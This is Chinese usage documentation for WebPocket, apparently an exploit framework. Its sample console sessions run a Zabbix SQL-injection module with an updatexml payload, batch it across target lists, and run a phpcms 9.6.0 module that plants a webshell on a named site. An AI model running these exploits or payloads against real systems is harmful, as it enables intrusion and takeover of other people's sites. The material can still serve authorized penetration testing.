快速入门¶
下载 && 安装¶
首先克隆最新的代码到本地
git clone https://github.com/TuuuNya/WebPocket
然后安装Python所需的模块
pip install requirements.txt
如果要使用虚拟环境可自行安装virtualenv等Python虚拟环境。
执行如下命令,如果看到WebPocket的Banner则为安装完成。
python WebPocket.py
➜ python3 WebPocket.py
W) ww b) P)ppppp k) t)
W) ww b) P) pp k) t)tTTT
W) ww ww e)EEEEE b)BBBB P)ppppp o)OOO c)CCCC k) KK e)EEEEE t)
W) ww ww e)EEEE b) BB P) o) OO c) k)KK e)EEEE t)
W) ww ww e) b) BB P) o) OO c) k) KK e) t)
W)ww www e)EEEE b)BBBB P) o)OOO c)CCCC k) KK e)EEEE t)T
(✿ ♥‿♥) WebPocket has 2 modules
WebPocket >
常用命令¶
对单目标执行POC/EXP¶
此处以 exploits/http/zabbix/zabbix_latest_php_sqli
模块为例,对目标 http://127.0.0.1:8080
执行。
WebPocket > use exploits/http/zabbix/zabbix_latest_php_sqli
WebPocket exploits(http/zabbix/zabbix_latest_php_sqli) > show options
Module options:
name required description value
------- ---------- ------------------------------------- ---------------------------------
URL True The url to be tested
TIMEOUT True Connection timeout 5
THREADS True The number of threads 1
SQL True The SQL statement you want to execute updatexml(0,concat(0xa,user()),0)
WebPocket exploits(http/zabbix/zabbix_latest_php_sqli) > set URL http://127.0.0.1:8080
WebPocket exploits(http/zabbix/zabbix_latest_php_sqli) > check
[+] Check success!
[+] URL:http://127.0.0.1:8080 has the vulnerability
[*] module execution completed
WebPocket exploits(http/zabbix/zabbix_latest_php_sqli) > exploit
[+] Exploit success!
[+] Exploit result: root@172.18.0.4
[*] module execution completed
WebPocket exploits(http/zabbix/zabbix_latest_php_sqli) >
首先 use
模块,然后使用 show options
查看需要设置的参数。
最后使用 check
或者 exploit
执行检查/测试。
对多个目标执行POC/EXP¶
首先执行 python WebPocket.py
进入交互式命令行。
当要对多个目标执行POC的时候,可以把目标写入到txt文件,然后使用 set URL -f target.txt
传入。例如:
WebPocket exploits(http/zabbix/zabbix_latest_php_sqli) > use exploits/http/zabbix/zabbix_latest_php_sqli
WebPocket exploits(http/zabbix/zabbix_latest_php_sqli) > show options
Module options:
name required description value
------- ---------- ------------------------------------- ---------------------------------
URL True The url to be tested
TIMEOUT True Connection timeout 5
THREADS True The number of threads 1
SQL True The SQL statement you want to execute updatexml(0,concat(0xa,user()),0)
WebPocket exploits(http/zabbix/zabbix_latest_php_sqli) > set URL -f url.txt
WebPocket exploits(http/zabbix/zabbix_latest_php_sqli) > set THREADS 20
WebPocket exploits(http/zabbix/zabbix_latest_php_sqli) > exploit
[+] Exploit result: root@172.18.0.4
[+] Exploit result: root@172.18.0.4
[+] URL:http://www.hackersb.cn Maybe not zabbix? not found zbx_sessionid
[+] URL:http://www.hackersb.cn Maybe not zabbix? not found zbx_sessionid
[+] Exploit result: root@172.18.0.4
[+] Exploit result: root@172.18.0.4
[+] URL:http://www.hackersb.cn Maybe not zabbix? not found zbx_sessionid
[+] URL:http://www.hackersb.cn Maybe not zabbix? not found zbx_sessionid
[+] URL:http://www.hackersb.cn Maybe not zabbix? not found zbx_sessionid
WebPocket exploits(http/zabbix/zabbix_latest_php_sqli) >
相信你也看到了,可以设置 THREADS
来设置线程数,支持多线程执行 :)
所有命令¶
help¶
输入 help
可查看所有命令
WebPocket > help
Documented commands (type help <topic>):
Core Command
============
banner db_rebuild
Module Command
==============
back check exploit list reload run search set show use
Other
=====
help history quit
WebPocket >
help
后可跟WebPocket命令,用来查看WebPocket命令的作用
WebPocket > help quit
Usage: quit [-h]
Exit this application
optional arguments:
-h, --help show this help message and exit
WebPocket >
list¶
list
命令用来列出所有可用的模块
WebPocket > list
Module List:
module_name check disclosure_date description
------------------------------------------- ------- ----------------- -----------------------------------
exploits/cms/zabbix_2_0_3_sqli False 2016-08-22 zabbix 2.0.3 jsrpc.php sqli
exploits/cms/phpcms_9_6_0_register_getshell True 2017-04-14 phpcms 9.6.0 register page getshell
WebPocket >
注:WebPocket启动时会自动创建sqlite数据库,位于 database/
目录下, search
命令是从数据库中取出的数据。
如果添加或删除了模块,需要执行 db_rebuild
重新构建数据库以用于检索。
search¶
search
命令用来检索模块,可根据 name
, module_name
, description
, author
, disclosure_date
, service_name
, service_version
, check
字段来进行检索。
默认按 module_name
检索,比如:
WebPocket > search phpcms
Search results:
module_name check disclosure_date description
------------------------------------------- ------- ----------------- -----------------------------------
exploits/cms/phpcms_9_6_0_register_getshell True 2017-04-14 phpcms 9.6.0 register page getshell
[+] The search is only retrieved from the database
[+] If you add some new modules, please execute `db_rebuild` first
WebPocket >
支持多个关键词,使用方法如下:
WebPocket > search service_name=phpcms service_version=9.6.0
Search results:
module_name check disclosure_date description
------------------------------------------- ------- ----------------- -----------------------------------
exploits/cms/phpcms_9_6_0_register_getshell True 2017-04-14 phpcms 9.6.0 register page getshell
[+] The search is only retrieved from the database
[+] If you add some new modules, please execute `db_rebuild` first
WebPocket >
use¶
use
命令用于选择要使用的模块:
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) > use exploits/cms/phpcms_9_6_0_register_getshell
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) >
show¶
show
命令可用于查看模块信息,支持 info
, options
, missing
子命令。
show info
命令用于查看模块信息以及模块参数show options
命令用于查看模块参数show missing
命令用于查看必填却没有填写的参数
使用样例如下:
WebPocket > use exploits/cms/phpcms_9_6_0_register_getshell
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) > show info
Module info:
name: phpcms 9.6.0 register getshell
description: phpcms 9.6.0 register page getshell
author: ['unknown']
references: ['https://www.hackersb.cn/hacker/219.html']
disclosure_date: 2017-04-14
service_name: phpcms
service_version: 9.6.0
Module options:
name required description value
-------- ---------- ----------------- -------
host True The target domain
password True webshell password
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) > show options
Module options:
name required description value
-------- ---------- ----------------- -------
host True The target domain
password True webshell password
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) > show missing
Missing Module options:
name required description value
-------- ---------- ----------------- -------
host True The target domain
password True webshell password
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) >
set¶
set
命令用于设置模块参数,格式为:set name value
,使用案例如下:
WebPocket > use exploits/cms/phpcms_9_6_0_register_getshell
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) > show options
Module options:
name required description value
-------- ---------- ----------------- -------
host True The target domain
password True webshell password
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) > set host http://www.hackersb.cn
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) > set password 123
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) >
check¶
check
方法用于检测目标是否存在该模块所对应的漏洞。可理解为验证漏洞(POC)。
使用案例如下:
WebPocket > use exploits/cms/phpcms_9_6_0_register_getshell
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) > show options
Module options:
name required description value
-------- ---------- ----------------- -------
host True The target domain
password True webshell password
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) > set host http://www.hackersb.cn
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) > set password 123
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) > check
[+] Check success!
[+] Target http://www.hackersb.cn has vul
[*] module execution completed
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) >
exploit / run¶
exploit
命令等同于 run
,用于执行模块/Exploit
使用案例如下:
WebPocket > use exploits/cms/phpcms_9_6_0_register_getshell
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) > show options
Module options:
name required description value
-------- ---------- ----------------- -------
host True The target domain
password True webshell password
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) > set host http://www.hackersb.cn
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) > set password 123
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) > exploit
[+] Exploit success!
[+] Webshell: http://www.hackersb.cn/shell.php
[*] module execution completed
WebPocket exploits(cms/phpcms_9_6_0_register_getshell) >
back¶
back
命令用于取消选中的模块,和 use
命令相反。
reload¶
reload
命令用于重新加载模块,比如在执行WebPocket以后,修改了模块代码,需要重新加载最新的代码,可以使用该命令。